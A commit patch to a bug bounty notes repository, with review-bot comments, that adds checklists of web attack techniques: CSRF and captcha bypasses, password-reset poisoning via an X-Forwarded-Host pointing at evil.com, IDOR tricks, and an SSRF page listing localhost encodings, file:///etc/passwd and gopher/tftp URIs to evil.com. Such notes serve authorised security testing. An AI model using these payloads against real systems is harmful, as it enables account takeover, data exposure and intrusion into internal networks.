From 5ac45ada2bdb15daf62e93f8bdcdcf6fd224c58c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Sat, 9 Jul 2022 22:35:32 +0700 Subject: [PATCH] Added Joomla and SSRF, and doing some major changes --- Arbitrary File Upload.md | 10 +- Bypass/Bypass 429.md | 16 +- Bypass/Bypass CSRF.md | 28 ++-- Bypass/Bypass Captcha.md | 16 +- .../Forgot Password.md | 85 +++++++---- Cross Site Request Forgery.md | 53 ++++++- Cross Site Scripting.md | 6 +- Denial Of Service.md | 17 ++- Host Header Injection.md | 12 +- Insecure Direct Object References.md | 140 ++++++++++++------ Misc/Mass Assignment.md => Mass Assignment.md | 15 +- Misc/Account Takeover.md | 12 +- Misc/Broken Link Hijacking.md | 1 + Misc/Default Credentials | 0 README.md | 10 +- {Recon => Reconnaissance}/Github Dorks.md | 0 {Recon => Reconnaissance}/Google Dorks.md | 0 {Recon => Reconnaissance}/Scope.md | 0 {Recon => Reconnaissance}/Shodan Dorks.md | 0 Server Side Request Forgery.md | 106 +++++++++++++ Technologies/Joomla.md | 43 ++++++ 21 files changed, 435 insertions(+), 135 deletions(-) rename Misc/Password Reset Flaws.md => Checklist/Forgot Password.md (60%) rename Misc/Mass Assignment.md => Mass Assignment.md (67%) create mode 100644 Misc/Default Credentials rename {Recon => Reconnaissance}/Github Dorks.md (100%) rename {Recon => Reconnaissance}/Google Dorks.md (100%) rename {Recon => Reconnaissance}/Scope.md (100%) rename {Recon => Reconnaissance}/Shodan Dorks.md (100%) create mode 100644 Server Side Request Forgery.md create mode 100644 Technologies/Joomla.md diff --git a/Arbitrary File Upload.md b/Arbitrary File Upload.md index 8d247dc..ad4cc16 100644 --- a/Arbitrary File Upload.md +++ b/Arbitrary File Upload.md @@ -11,7 +11,7 @@ In upload file feature, for example upload photo profile feature ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 
@@ -21,7 +21,7 @@ Change the Content-Type ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" @@ -32,7 +32,7 @@ Content-Type: image/jpeg ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" @@ -42,7 +42,7 @@ Change the request to this ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" @@ -53,7 +53,7 @@ Content-Type: application/x-php ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" diff --git a/Bypass/Bypass 429.md b/Bypass/Bypass 429.md index 3444abc..2209ad2 100644 --- a/Bypass/Bypass 429.md +++ b/Bypass/Bypass 429.md @@ -14,7 +14,7 @@ For example: POST /ForgotPass.php HTTP/1.1 Host: target.com X-Forwarded-For : 127.0.0.1 -[...] +... email=victim@gmail.com ``` @@ -23,7 +23,7 @@ email=victim@gmail.com ``` POST /ForgotPass.php HTTP/1.1 Host: target.com -[...] +... email=victim@gmail.com%00 ``` @@ -33,7 +33,7 @@ email=victim@gmail.com%00 POST /ForgotPass.php HTTP/1.1 Host: target.com Cookie: xxxxxxxxxx -[...] +... email=victim@gmail.com ``` @@ -42,7 +42,7 @@ Try this to bypass POST /ForgotPass.php HTTP/1.1 Host: target.com Cookie: aaaaaaaaaaaaa -[...] +... email=victim@gmail.com ``` @@ -51,7 +51,7 @@ email=victim@gmail.com ``` POST /ForgotPass.php HTTP/1.1 Host: target.com -[...] +... email=victim@gmail.com ``` @@ -59,7 +59,7 @@ Try this to bypass ``` POST /ForgotPass.php?random HTTP/1.1 Host: target.com -[...] +... email=victim@gmail.com ``` @@ -68,7 +68,7 @@ email=victim@gmail.com ``` POST /api/forgotpass HTTP/1.1 Host: target.com -[...] +... {"email":"victim@gmail.com"} ``` 
@@ -76,7 +76,7 @@ Try this to bypass ``` POST /api/forgotpass HTTP/1.1 Host: target.com -[...] +... {"email":"victim@gmail.com "} ``` diff --git a/Bypass/Bypass CSRF.md b/Bypass/Bypass CSRF.md index 2cc165f..f6bde6b 100644 --- a/Bypass/Bypass CSRF.md +++ b/Bypass/Bypass CSRF.md @@ -4,7 +4,7 @@ ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -12,7 +12,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab ``` @@ -21,7 +21,7 @@ username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -29,7 +29,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token= ``` @@ -38,7 +38,7 @@ username=dapos&password=123456&token= ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaa ``` @@ -46,7 +46,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaabaa ``` @@ -54,7 +54,7 @@ username=dapos&password=123456&token=aaabaa ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -62,14 +62,14 @@ Try this to bypass ``` GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 Host: target.com -[...] +... ``` 5. Remove the token from request ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -77,7 +77,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456 ``` 
@@ -86,7 +86,7 @@ username=dapos&password=123456 ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=ANOTHER_VALID_TOKEN ``` @@ -95,7 +95,7 @@ username=dapos&password=123456&token=ANOTHER_VALID_TOKEN ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=MTIzNDU2 ``` @@ -105,7 +105,7 @@ MTIzNDU2 => 123456 with base64 ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=vi802jg9f8akd9j123 ``` @@ -113,7 +113,7 @@ When we register again, the request like this ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=vi802jg9f8akd9j124 ``` diff --git a/Bypass/Bypass Captcha.md b/Bypass/Bypass Captcha.md index e2dbfc3..dc6849f 100644 --- a/Bypass/Bypass Captcha.md +++ b/Bypass/Bypass Captcha.md @@ -4,7 +4,7 @@ ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 ``` @@ -13,14 +13,14 @@ Change the method to GET ``` GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1 Host: target.com -[...] +... ``` 2. Try remove the value of the captcha parameter ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=&_Username=daffa&_Password=test123 ``` @@ -29,7 +29,7 @@ _RequestVerificationToken=&_Username=daffa&_Password=test123 ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123 ``` @@ -38,7 +38,7 @@ _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123 ``` POST / HTTP 1.1 Host: target.com -[...] +... {"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"} ``` @@ -46,7 +46,7 @@ Convert to normal request ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 ``` 
@@ -63,7 +63,7 @@ X-Remote-Addr: 127.0.0.1 ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 ``` @@ -71,7 +71,7 @@ Try this to bypass ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123 ``` diff --git a/Misc/Password Reset Flaws.md b/Checklist/Forgot Password.md similarity index 60% rename from Misc/Password Reset Flaws.md rename to Checklist/Forgot Password.md index 32dfb66..5cd1820 100644 --- a/Misc/Password Reset Flaws.md +++ b/Checklist/Forgot Password.md 
@@ -1,86 +1,109 @@ -## Password Reset Flaws +## Forgot Password Functionality ## Introduction -Common security flaws in password reset functionality +Some common bugs in the forgot password / reset password functionality ## How to exploit -1. Parameter pollution in reset password +1. Parameter pollution ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com&email=hacker@mail.com ``` 2. Bruteforce the OTP code ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com&code=$123456$ ``` 3. Host header Injection ``` -POST /reset -Host: evil.com -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com ``` +to ``` -POST /reset +POST /reset HTTP/1.1 Host: target.com X-Forwarded-Host: evil.com -[...] +... + email=victim@mail.com ``` And the victim will receive the reset link with evil.com 4. Using separator in value of the parameter ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com,hacker@mail.com ``` ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com%20hacker@mail.com ``` ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com|hacker@mail.com ``` ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com%00hacker@mail.com ``` 5. No domain in value of the paramter ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim ``` 6. No TLD in value of the parameter ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail ``` 7. Using carbon copy ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com%0a%0dcc:hacker@mail.com ``` 8. If there is JSON data in body requests, add comma ``` -POST /newaccount -[...] +POST /newaccount HTTP/1.1 +Host: target.com +... + {"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"} ``` 
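Review bot: the unchanged line `5. No domain in value of the paramter` still carries the `paramter` typo even though every request block in this file is being rewritten; fix it to `parameter` in the same pass. In item 3 the two requests are joined by a bare `to` line; a short sentence such as `Then add an X-Forwarded-Host header:` reads better than the one-word connector, and the heading `3. Host header Injection` should be `3. Host Header Injection` to match the name of the Host Header Injection page in this repository.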
@@ -90,6 +113,12 @@ POST /newaccount - Generated based on the email of the user - Generated based on the name of the user +10. Try Cross-Site Scripting (XSS) in the form + +Sometimes the email is reflected in the forgot password page, try to use XSS payload +``` +""@gmail.com +``` ## References * [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) * [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414) \ No newline at end of file diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index dd458c4..2fcdafe 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -3,7 +3,7 @@ ## Introduction Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated -## How to find +## Where to find Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) ## How to exploit @@ -43,4 +43,53 @@ xhr.send('{"role":admin}'); ``` 5. Multipart request -Soon \ No newline at end of file +```html + + Multipart CSRF PoC + + +
+
+

Click Submit request


+ +
+ +
+
+ +``` \ No newline at end of file diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index cbccd0d..1109185 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md 
@@ -236,7 +236,7 @@ ${alert(1)} 'onload=alert(1)>'onload="/* victim@mail.com -9. If the website using graphql, try to find IDOR using graphql! +9. If the website using GraphQL, try to find IDOR using GraphQL ``` -GET /graphql -[...] +GET /graphql HTTP/1.1 +Host: example.com +... ``` ``` -GET /graphql.php?query= -[...] +GET /graphql.php?query= HTTP/1.1 +Host: example.com +... ``` 10. MFLAC (Missing Function Level Access Control) ``` -GET /admin/profile +GET /admin/profile HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` -GET /ADMIN/profile +GET /ADMIN/profile HTTP/1.1 +Host: example.com +... ``` 11. Try to swap uuid with number ``` -GET /file?id=90ri2-xozifke-29ikedaw0d +GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` GET /file?id=302 +Host: example.com +... ``` 12. Change HTTP Method ``` -GET /api/v1/users/profile/111 +GET /api/v1/users/profile/111 HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` -POST /api/v1/users/profile/111 +POST /api/v1/users/profile/111 HTTP/1.1 +Host: example.com +... ``` 13. Path traversal ``` -GET /api/v1/users/profile/victim_id +GET /api/v1/users/profile/victim_id HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` -GET /api/v1/users/profile/my_id/../victim_id +GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1 +Host: example.com +... ``` -14. Change request content type +14. Change request `Content-Type` ``` +GET /api/v1/users/1 HTTP/1.1 +Host: example.com Content-type: application/xml ``` Try this to bypass ``` +GET /api/v1/users/2 HTTP/1.1 +Host: example.com Content-type: application/json ``` 15. Send wildcard instead of ID ``` -GET /api/users/111 +GET /api/users/111 HTTP/1.1 +Host: example.com ``` Try this to bypass ``` -GET /api/users/* +GET /api/users/* HTTP/1.1 +Host: example.com +``` +``` +GET /api/users/% HTTP/1.1 +Host: example.com +``` +``` +GET /api/users/_ HTTP/1.1 +Host: example.com +``` +``` +GET /api/users/. 
HTTP/1.1 +Host: example.com ``` - 16. Try google dorking to find new endpoint ## References diff --git a/Misc/Mass Assignment.md b/Mass Assignment.md similarity index 67% rename from Misc/Mass Assignment.md rename to Mass Assignment.md index 5522e46..d5cf279 100644 --- a/Misc/Mass Assignment.md +++ b/Mass Assignment.md @@ -6,22 +6,25 @@ Occurs when an app allows a user to manually add parameters in an HTTP Request & ## How to exploit - Normal request ``` -POST /editdata -Host: vuln.com +POST /editdata HTTP/1.1 +Host: target.com +... username=daffa ``` +The response ``` HTTP/1.1 200 OK ... -username=daffa&admin=false +{"status":"success","username":"daffainfo","isAdmin":"false"} ``` - Modified Request ``` -POST /editdata -Host: vuln.com +POST /editdata HTTP/1.1 +Host: target.com +... username=daffa&admin=true ``` @@ -30,7 +33,7 @@ username=daffa&admin=true HTTP/1.1 200 OK ... -username=daffa&admin=true +{"status":"success","username":"daffainfo","isAdmin":"true"} ``` ## References diff --git a/Misc/Account Takeover.md b/Misc/Account Takeover.md index 38977b1..ff2788f 100644 --- a/Misc/Account Takeover.md +++ b/Misc/Account Takeover.md @@ -12,14 +12,14 @@ Account Takeover (known as ATO) is a type of identity theft where a bad actor ga 2. Try re-sign up using same email ``` - POST /newaccount - [...] + POST /newaccount HTTP/1.1 + ... email=victim@mail.com&password=1234 ``` After sign up using victim email, try signup again but using different password ``` - POST /newaccount - [...] + POST /newaccount HTTP/1.1 + ... email=victim@mail.com&password=hacked ``` @@ -41,9 +41,9 @@ Account Takeover (known as ATO) is a type of identity theft where a bad actor ga 4. Chaining with IDOR, for example ``` - POST /changepassword.php + POST /changepassword.php HTTP/1.1 Host: site.com - [...] + ... userid=500&password=heked123 ``` 500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID 
diff --git a/Misc/Broken Link Hijacking.md b/Misc/Broken Link Hijacking.md index 901d986..11b52a0 100644 --- a/Misc/Broken Link Hijacking.md +++ b/Misc/Broken Link Hijacking.md @@ -9,6 +9,7 @@ Broken Link Hijacking exists whenever a target links to an expired domain or pag ## Tools - [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) +- [Check My Links](https://chrome.google.com/webstore/detail/check-my-links/ojkcdipcgfaekbeaelaapakgnjflfglf/related) ## References - [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) diff --git a/Misc/Default Credentials b/Misc/Default Credentials new file mode 100644 index 0000000..e69de29 diff --git a/README.md b/README.md index 2d4d248..dd4b09a 100644 --- a/README.md +++ b/README.md @@ -6,7 +6,7 @@ These are my bug bounty notes that I have gathered from various sources, you can ![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty) ![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty) -## List +## List Vulnerability - [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) - [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md) 
@@ -17,6 +17,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md) +- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Mass%20Assignment.md) - [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md) @@ -24,6 +25,10 @@ These are my bug bounty notes that I have gathered from various sources, you can - SQL Injection (SOON) - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) +## Checklist +- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md) +- Register Functionality SOON! + ## List Bypass - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md) - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md) 
@@ -38,8 +43,6 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Default Credentials](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Default%20Credentials.md) - [Email Spoofing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Email%20Spoofing.md) - [JWT Vulnerabilities](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/JWT%20Vulnerabilities.md) -- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md) -- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md) - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) ## Technologies @@ -48,6 +51,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) +- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md) - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md) - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md) - [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md) diff --git a/Recon/Github Dorks.md b/Reconnaissance/Github Dorks.md similarity index 100% rename from Recon/Github Dorks.md rename to Reconnaissance/Github Dorks.md diff --git a/Recon/Google Dorks.md b/Reconnaissance/Google Dorks.md similarity index 100% rename from Recon/Google Dorks.md rename to Reconnaissance/Google Dorks.md diff --git a/Recon/Scope.md b/Reconnaissance/Scope.md similarity index 100% rename from Recon/Scope.md rename to Reconnaissance/Scope.md 
diff --git a/Recon/Shodan Dorks.md b/Reconnaissance/Shodan Dorks.md similarity index 100% rename from Recon/Shodan Dorks.md rename to Reconnaissance/Shodan Dorks.md diff --git a/Server Side Request Forgery.md b/Server Side Request Forgery.md new file mode 100644 index 0000000..f7431b9 --- /dev/null +++ b/Server Side Request Forgery.md 
@@ -0,0 +1,106 @@ +# Server Side Request Forgery (SSRF) + +## Introduction +Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server + +## Where to find +Usually it can be found in the request that contain request to another url, for example like this +``` +POST /api/check/products HTTP/1.1 +Host: example.com +Content-Type: application/x-www-form-urlencoded +Origin: https://example.com +Referer: https://example.com + +urlApi=http://192.168.1.1%2fapi%2f&id=1 +``` + +or + +``` +GET /image?url=http://192.168.1.1/ +Host: example.com +``` + +## How to exploit +1. Basic payload +``` +http://127.0.0.1:1337 +http://localhost:1337 +``` + +2. Hex encoding +``` +http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1 +``` + +3. Octal encoding +``` +http://127.0.0.1 -> http://0177.0.0.01 +``` + +4. Dword encoding +``` +http://127.0.0.1 -> http://2130706433 +``` + +5. Mixed encoding +``` +http://127.0.0.1 -> http://0177.0.0.0x1 +``` + +6. Using URL encoding +``` +http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74 +``` + +7. Using IPv6 +``` +http://0000::1:1337/ +http://[::]:1337/ +``` + +8. Using bubble text +``` +http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ + +Use this https://capitalizemytitle.com/bubble-text-generator/ +``` + +## How to exploit (URI Scheme) +1. File scheme +``` +file:///etc/passwd +``` + +2. Dict scheme +``` +dict://127.0.0.1:1337/ +``` + +3. FTP scheme +``` +ftp://127.0.0.1/ +``` + +4. TFTP scheme +``` +tftp://evil.com:1337/test +``` + +5. SFTP scheme +``` +sftp://evil.com:1337/test +`` + +6. LDAP scheme +``` +ldap://127.0.0.1:1337/ +``` + +7. Gopher scheme +``` +gopher://evil.com/_Test%0ASSRF +``` +## References +* [Vickie Li](https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b) \ No newline at end of file diff --git a/Technologies/Joomla.md b/Technologies/Joomla.md new file mode 100644 index 0000000..5a6a4ff --- /dev/null +++ b/Technologies/Joomla.md 
@@ -0,0 +1,43 @@ +# Grafana + +## Introduction +What would you do if you came across a website that uses Joomla ? + +## How to Detect +Try to HTTP request to `https://example.com/` and if you see the source code, you will see something like this `` + +1. Find the related CVE by checking the core, plugins, and theme version +* How to find the joomla version +``` +https://target.com/administrator/manifests/files/joomla.xml +``` + +* How to find the joomla plugin version +``` +https://target.com/administrator/components/com_NAMEPLUGIN/NAMEPLUGIN.xml + +for example + +https://target.com/administrator/components/com_contact/contact.xml +``` + +> or change NAMEPLUGIN.xml to `changelog.txt` or `readme.md` or `readme.txt` + +* How to find the theme version +``` +https://target.com/wp-content/themes/THEMENAME/style.css +https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file) +``` +If you found outdated core / plugins, find the exploit at https://exploit-db.com + +2. Joomla! Config Dist File +``` +https://example.com/configuration.php-dist +``` +3. Database File List +``` +https://example.com/libraries/joomla/database/ +``` + +## References +- [Exploit-db #6377](https://www.exploit-db.com/ghdb/6377) \ No newline at end of file
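Review bot: the Bypass Captcha hunks still show request lines as `POST / HTTP 1.1` and `GET /?_RequestVerificationToken=... HTTP 1.1` (no slash before the version) while this commit normalizes request lines to `HTTP/1.1` in every other file; since each of those blocks is already touched by the `[...]` to `...` change, correct them to `HTTP/1.1` here rather than in a follow-up.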
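Review bot: in the second Forgot Password hunk (`@@ -90,6 +113,12 @@`), the closing fence of the new item 10 is immediately followed by `## References` with no blank line, which some Markdown renderers fold into the code block; add a blank line. The example inside that fence also shows only `""@gmail.com`, so the item does not demonstrate what the sentence above it describes; check that the intended example was committed in full.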
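Review bot: the new Broken Link Hijacking tool entry links to `.../ojkcdipcgfaekbeaelaapakgnjflfglf/related`, which is the "related extensions" tab of the Web Store listing rather than the extension page itself; drop the trailing `/related` so the link lands on the extension.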
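Review bot: in the Mass Assignment hunks the request still sends `username=daffa` but the new response lines return `"username":"daffainfo"`, so the example no longer reads as one exchange; use the same value in both. The new `"isAdmin":"false"` and `"isAdmin":"true"` are quoted strings, which obscures the point of the example (a boolean privilege flag being flipped); `"isAdmin":false` / `"isAdmin":true` would be clearer.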
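Review bot: the Account Takeover hunk `@@ -12,14 +12,14 @@` adds `HTTP/1.1` to the `POST /newaccount` lines but, unlike every other file in this commit, does not add a `Host:` header, and the new lines keep the leading indentation inside the fence; add `Host: target.com` and strip the indentation so the blocks match the house format used elsewhere (the `@@ -41,9 +41,9 @@` hunk in the same file already has `Host: site.com`, so the two examples are inconsistent with each other too).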
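Review bot: in the Insecure Direct Object References hunk, the item 11 bypass block keeps `GET /file?id=302` unchanged while adding `Host: example.com` beneath it, so it is the only request in the file without `HTTP/1.1`; add the version there. The new heading text `9. If the website using GraphQL, try to find IDOR using GraphQL` is missing a verb (`If the website is using GraphQL`), and `16. Try google dorking` should capitalize `Google`.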
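Review bot: in the new Server Side Request Forgery.md, the closing fence under `5. SFTP scheme` is two backticks (`` `` ``) instead of three, which leaves the fence open and breaks rendering of items 6 and 7 and the References section; make it three backticks. Also, the second `Where to find` example (`GET /image?url=http://192.168.1.1/`) lacks `HTTP/1.1` while the first one and the rest of the commit include it; the sentence `Usually it can be found in the request that contain request to another url` reads better as `Usually it is found in requests that carry another URL as a parameter, for example:`; and `## References` needs a blank line before it.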
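Review bot: the new Technologies/Joomla.md opens with `# Grafana`, a copy-paste leftover that should be `# Joomla`. The `How to find the theme version` block points at `wp-content/themes/THEMENAME/style.css` and `readme.txt`, which is the WordPress layout, not Joomla's; Joomla templates live under `/templates/TEMPLATENAME/` with their version in `templateDetails.xml`, so replace those two lines. Smaller points in the same file: the inline code after `you will see something like this` is empty in the diff as shown, so the generator meta tag text appears to be missing; `Joomla ?` has a stray space before the question mark; `If you found outdated core / plugins` should be `If you find`; and the file lacks a trailing newline (as does the new SSRF page).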
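Review bot: in the first README.md hunk, the renamed heading `## List Vulnerability` is ungrammatical; `## Vulnerability List` or `## List of Vulnerabilities` fits the existing `## List Bypass` style better (that heading has the same problem and could be fixed alongside it).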
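Review bot: in the README.md hunk `@@ -38,8 +43,6 @@`, the surviving context line links to `Misc/Default%20Credentials.md`, but this commit creates `Misc/Default Credentials` with no `.md` extension and an empty blob (`e69de29`), so the link will not resolve and the file has no content; either drop the empty file from the commit or name it `Default Credentials.md` and fill it in.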
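Review bot: in the README.md hunk `@@ -48,6 +51,7 @@`, the new `Joomla` entry is inserted between `Jira` and `Jenkins`, which leaves the Technologies list out of alphabetical order (the existing `Jira`, `Jenkins` pair was already reversed); reorder to `Jenkins`, `Jira`, `Joomla` while touching these lines.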